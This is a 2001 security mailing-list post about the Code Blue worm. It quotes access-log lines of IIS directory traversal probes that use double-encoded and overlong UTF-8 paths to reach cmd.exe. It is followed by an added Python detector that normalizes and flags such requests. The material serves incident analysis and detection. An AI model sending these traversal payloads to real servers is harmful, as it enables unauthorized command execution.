Security Incidents mailing list archives

Anyone seen any evidence of "Code Blue?"


From: Michael Katz <mike () responsible com>
Date: Tue, 11 Sep 2001 19:18:39 -0700

Hi all,

Why have I not seen anything on this list about the "Code Blue" worm? I have received some alerts and news stories about a "Code Blue" worm:

http://www.infoworld.com/articles/hn/xml/01/09/07/010907hncodeblue.xml?0907alert
http://news.cnet.com/news/0-1003-200-7086783.html?tag=lh

A Chinese antivirus software company even has a cleanup tool for it at:

http://www.iduba.net/download/other/tool_010907_CodeBlue.htm

And other antivirus software companies now have virus definitions, explanations of the worm, and cleanup instructions:

http://www.sarc.com/avcenter/venc/data/w32.bluecode.worm.html
http://vil.mcafee.com/dispVirus.asp?virus_k=99202&;
http://www.f-secure.com/v-descs/codeblue.shtml

Last, but not least, the FBI's Infragard program issued an advisory about it on September 10, 2001.

What is curious is the lack of discussion about it in a forum where I would expect to see it discussed.

Does anyone have a signature for IDS, what it looks like in a web server access log, or packet captures of its file transfer activity?

I submit the following web server access log as a possible candidate based on its source in Asia, that it is a new pattern we have seen recently, and it matches with the reported infection method:

a.b.c.d - - [10/Sep/2001:20:45:12 -0700] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:45:18 -0700] "GET /scripts/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 305 "-" "-"
a.b.c.d - - [10/Sep/2001:20:45:20 -0700] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:45:24 -0700] "GET /cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:45:38 -0700] "GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207
a.b.c.d - - [10/Sep/2001:20:46:02 -0700] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207
a.b.c.d - - [10/Sep/2001:20:46:04 -0700] "GET /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:07 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:09 -0700] "GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:12 -0700] "GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:14 -0700] "GET /cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:18 -0700] "GET /cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:20 -0700] "GET /cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:22 -0700] "GET /cgi-bin/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:24 -0700] "GET /scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:26 -0700] "GET /scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:29 -0700] "GET /scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"

Does anyone know whether this is indicative of a Code Blue infected machine - or some other automated tool?

Michael Katz
mike () responsible com
Responsible Solutions, Ltd.
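The post asks what these requests look like to a detector. The following is an added example (editor's code, not part of the original post or of any vendor's signature) that answers the detection side of the question: it parses NCSA-style access log lines, repeatedly percent-decodes the request target, decodes overlong UTF-8 sequences such as %c0%af and %c1%9c the way a lenient server would, and then reports which traversal indicators remain. The sample input is constructed from a subset of the poster's own log entries plus one benign request; the log format is assumed to be Apache common/combined format.

```python
"""Normalize encoded request targets from a web access log and flag traversal probes."""
import re
from urllib.parse import unquote_to_bytes

# Constructed sample: six request styles taken from the post plus one benign hit.
SAMPLE_LOG = r'''a.b.c.d - - [10/Sep/2001:20:45:12 -0700] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:45:20 -0700] "GET /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:04 -0700] "GET /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:07 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:18 -0700] "GET /cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:46:29 -0700] "GET /scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 207 "-" "-"
a.b.c.d - - [10/Sep/2001:20:50:01 -0700] "GET /products/index.html HTTP/1.0" 200 1024 "-" "Mozilla/4.0"
'''

# NCSA common/combined log: host ident user [time] "method target protocol" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)(?: \S+)?" (\d{3}) (\S+)')
TRAVERSAL_RE = re.compile(r'(?:^|/)\.\.(?:/|$)')


def percent_decode_repeatedly(target, max_passes=4):
    """Decode %xx escapes until nothing changes; %255c needs two passes to become a backslash.
    Invalid escapes such as %%35 are left alone by unquote_to_bytes, so %%35%63 -> %5c -> \\."""
    data = target.encode("latin-1", "replace")
    passes = 0
    for _ in range(max_passes):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, passes = decoded, passes + 1
    return data, passes


def lenient_utf8_decode(data):
    """Decode UTF-8 without rejecting overlong forms, mirroring the flaw the probes rely on.
    Returns (text, saw_overlong, saw_malformed); bad bytes become U+FFFD."""
    out, overlong, malformed, i = [], False, False, 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b)); i += 1; continue
        if 0xC0 <= b <= 0xDF:   need, cp = 1, b & 0x1F
        elif 0xE0 <= b <= 0xEF: need, cp = 2, b & 0x0F
        elif 0xF0 <= b <= 0xF7: need, cp = 3, b & 0x07
        else:                   need = 0
        tail = data[i + 1:i + 1 + need]
        if need == 0 or len(tail) != need or any(not 0x80 <= t <= 0xBF for t in tail):
            out.append("\ufffd"); malformed = True; i += 1; continue
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        if cp < (0x80, 0x800, 0x10000)[need - 1]:
            overlong = True          # e.g. c0 af -> '/', c1 9c -> '\'
        out.append(chr(cp) if cp < 0x110000 else "\ufffd")
        i += 1 + need
    return "".join(out), overlong, malformed


def decode_request_target(target):
    """Full normalization: percent-decode, lenient UTF-8 decode, unify path separators."""
    raw, passes = percent_decode_repeatedly(target)
    text, overlong, malformed = lenient_utf8_decode(raw)
    return text.replace("\\", "/"), passes, overlong, malformed


def indicators_for(target):
    """Return (normalized_path, list of indicator names) for one request target."""
    path, passes, overlong, malformed = decode_request_target(target)
    low = path.lower()
    found = []
    if TRAVERSAL_RE.search(path): found.append("traversal")
    if "cmd.exe" in low:          found.append("cmd.exe")
    if "system32" in low:         found.append("system32")
    if passes > 1:                found.append("double_encoding")
    if overlong:                  found.append("overlong_utf8")
    if malformed:                 found.append("malformed_utf8")
    return path, found


def scan_log(text):
    """Parse each log line and return the entries that carry a traversal or cmd.exe indicator."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        host, ts, method, target, status, _size = m.groups()
        path, found = indicators_for(target)
        if "traversal" in found or "cmd.exe" in found:
            hits.append({"host": host, "time": ts, "status": int(status),
                         "raw": target, "normalized": path, "indicators": found})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["status"], ",".join(hit["indicators"]), hit["normalized"])
```

Two design points: the decoder deliberately accepts overlong sequences instead of rejecting them, because the point is to see the path the way a permissive server would resolve it; and the decision is made on the normalized path rather than on the raw bytes, which is why one rule catches %255c, %%35%63, %c0%af and %c1%9c alike instead of needing a signature per encoding. The malformed_utf8 indicator covers the backslash-interleaved variant in the post, where the byte sequence never forms a valid multi-byte character but the cmd.exe target still survives decoding.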


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com

